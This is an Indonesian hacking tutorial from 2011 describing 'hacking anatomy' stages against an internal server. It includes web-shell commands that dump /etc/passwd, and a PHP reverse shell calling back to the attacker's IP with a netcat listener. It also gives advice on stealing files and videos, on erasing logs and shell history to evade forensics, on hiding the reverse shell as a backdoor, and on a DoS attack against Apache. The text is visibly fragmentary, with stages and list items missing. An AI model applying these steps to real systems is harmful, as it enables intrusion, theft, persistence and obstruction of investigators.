Oleh:
Ade Ismail Isnan
@inan19x
http://inan.tibandung.com
ade.ismail.isnan@gmail.com
Copyleft 2011
You are legally to copy and redistribute this document as much as you wish...
Dalam melakukan hacking tentu ada langkah-langkah yang kita lakukan. Sebenarnya langkah-langkah
itu adalah anatomi kita dalam melakukan hacking dan masing-masing memiliki tujuan tersendiri
sehingga dengan tercapainya mini-goal tersebut, kita bisa maju ke langkah selanjutnya. Tetapi supaya
tidak bosan baca teori anatomi hackingnya, di post ini juga akan diberikan contoh real hacking nya
tentu saja yang sudah dibagi-bagi per stage anatominya.
Hacking Anatomy
Hacking Stage 0: Define the Target
Tentukan target yang akan kita serang. Target bisa didapat dari permintaan sang target sendiri untuk
audit keamanannya, atau karena hanya iseng, ataupun karena dendam sama target hahah. Untuk contoh
kali ini, target saya adalah sebuah server internal ber-IP private (192.168.66.87) yang ingin di audit
keamanannya (jadi bukan karena dendam hehe).
Jangan terlalu terpaku pada informasi yang saya dapatkan ya. Masih banyak informasi yang bisa
didapatkan pada stage 1 ini. Diantaranya nih:
1.
2.
3.
4.
http://192.168.66.87/webdav/php_cmd.php?
cmd=cat%20/etc/passwd
Output
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
...dst...
http://192.168.66.87/webdav/php_cmd.php?
2.6.9-55.ELsmp
cmd=uname%20-r
Hmm saya coba upload file pamungkas bernama php-reverse-shell.php yang saya dapat dari
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
untuk mendapatkan shell target
memanfaatkan php. Modifikasi sedikit agar tujuan menuju IP saya dan portnya yang sudah menunggu
heheh. Tinggal ketikkan ini di URL:
http://192.168.66.87/webdav/php-reverse-shell.php?ip=10.5.239.236&port=9999
Sementara netcat (nc) sudah stenbai listening di komputer saya dan spawn the targets shell.. Horray!
nya
Who am I? Im w00t!
Hacking Stage 6: Pilfering
Tahap ini adalah tahap yang tidak terlalu wajib dilakukan. Menurut kamus sih pilfering artinya
pencurian haha Ya kita bisa mencuri apa saja yang ada pada target. Misalnya dumping file
username/password pada system (/etc/passwd dan /etc/shadow), masuk ke database mysql dan jalanjalan liat table databasenya, atau curi-curi foto dan video. Sapa tau ada video skandal sysadminnya
hahah.
Hacking Stage 7: Covering Tracks
Tahap selanjutnya adalah tahap yang biasanya malah lupa dilakukan orang yang berhasil break into
targets system. Padahal tim ahli forensik bisa menangkap kita karena track record ini. Bukti di
pengadilan ya track record ini juga. Makanya kalau habis masuk rumah orang tanpa izin jangan lupa di
pel tuh bekas lumpur di lantai dan sidik jari di gagang pintu hehe.
Ini contoh log terakhir yang ada di target.. IP kita keliatan toh.. Ooo hahahahah
Access Log
Silahkan berkreasi untuk membersihkan log nya. Contoh di atas ini adalah log HTTP request.. Mungkin
bisa di edit untuk hapus line-line yang mencurigakan hehe. Ada lagi log session SSH kita juga tentu
saja.. jangan lupa. Untuk membuat session SSH tidak tercatat, jangan lupa ketik command unset
HISTFILE dan history -c setelah beraktifitas di shell target. Atau bisa dengan mengetikkan command
HISTFILE=/dev/null sebelum beraktifitas di shell target sedemikian sehingga variable HISTFILE
akan selalu dicatat ke /dev/null (=buang) oleh shell target.
*clue* Di sistem target (karena sistemnya *nix), ada 3 log file penting, yang mencatat..:
1. WTMP setiap log in/off, waktu log in/off, tty, host
2. UTMP siapa yang online saat ini
3. Lastlog dari mana sumber log in terakhir
Lokasi file ini biasanya di /etc/ atau /var/adm/ atau /var/log dsb. Nah, silakan cari cara untuk cover
track yang nanganin dan ngebersihin 3 file ini hehe
Hacking Stage 8: Creating Backdoors
Ada banyak cara membuat backdoor. Sesuai arti katanya, backdoor artinya pintu belakang atau jalan
alternatif untuk kita masuk ke dalam sistem itu untuk kebutuhan kedepan hahah. Kalau bisa dibuat
semudah mungkin untuk masuknya. Jangan serumit waktu pertama kali masuk ke target. Contoh
backdoor bisa saja menginstall service yang listen pada port rahasia yang memprovide kita akses
langsung ke shell target, membuat user baru, dan lain sebagainya.
Untuk contoh kita tadi, backdoor kita tentu saja file php-reverse-shell.php di URL rahasia kita:
http://192.168.66.87/webdav/php-reverse-shell.php?ip=10.5.239.236&port=9999
Jadi kedepannya kalau kita mau bertamu ke target lagi, tinggal siapin link di atas ini plus netcat di
komputer kita yang set listen di port 9999. Tips: kalau bisa nama file backdoornya jangan php-reverseshell.php sangat mencurigakan.. hahahah.. sedikit kreatif untuk rename file dan sembunyiin di
folder-folder tertentu haha.
Hacking Stage 9: Denial of Service
Denial of Service (DoS) adalah ancaman yang paling sering terjadi di dunia security. Siapa saja bisa
melakukan dan ini bisa terjadi kapan saja, tidak harus karena ulah hacker, bahkan bisa terjadi karena
ulah anak-anak alay yang gak ngerti komputer! Sesuai artinya, denial of service ya berarti si target
menolak menjalankan service seperti biasanya. Katakanlah target kita adalah website registrasi e-KTP.
Denial of service berarti adalah si server target e-KTP tidak bisa menjalankan service e-KTP untuk
anda karena terlalu sibuk/down. Bayangkan betapa kecewanya kita dan betapa ruginya instansi e-KTP
yang tidak bisa melayani (roda bisnis macet -halah).
Faktor-faktor yang menyebabkan denial of service ada banyak. Ada yang karena diserang ribuan rikues
bertubi-tubi terus bikin si server sibuk, sampai yang emang karena si penyerang yang berhasil break-in
(seperti kita di stage sebelumnya) sengaja ngetik command /etc/init.d/httpd stop. Ya kalau httpd stop
sama aja dengan menolak layanan web dari client kan??
Ini contoh Denial of Service akibat ulah anak-anak alay yang bahkan gak ngerti hacking sekalipun:
(dari Wikipedia)
This describes a situation where a website ends up denied, not due to a deliberate attack by
a single individual or group of individuals, but simply due to a sudden enormous spike in
popularity. This can happen when an extremely popular website posts a prominent link to a
second, less well-prepared site, for example, as part of a news story. The result is that a
significant proportion of the primary sites regular users potentially hundreds of
thousands of people click that link in the space of a few hours, having the same effect on
the target website as a DDoS attack. A VIPDoS is the same, but specifically when the link
was posted by a celebrity.
An example of this occurred when Michael Jackson died in 2009. Websites such as Google
and Twitter slowed down or even crashed.Many sites servers thought the requests were
from a virus or spyware trying to cause a Denial of Service attack, warning users that their
queries looked like automated requests from a computer virus or spyware application.
Untuk contoh melakukan serang DoS kali ini, saya akan serang service Apache target (192.168.66.87)
sampai mabok karena request partial content yang bertubi-tubi..
DoS Attack
Sambil mengeksekusi program tersebut saya coba menjalankan file test.html yang cuma berisi kata
hello world dan. butuh waktu > 3 menit.. bayangkan betapa sibuknya si server. Ini masih bisa di
rekayasa dengan membuat parallel reqs nya lebih besar lagi dan loop lebih banyak lagi.. bisa dijamin
mabok Apachenya. Hehehe.
Penutup
Demikianlah stage hacking dan contoh nyata nya di setiap stage. Hasil akhir setiap stage akan
berpengaruh ke stage selanjutnya. Sekian yang bisa saya sampaikan, semoga bermanfaat.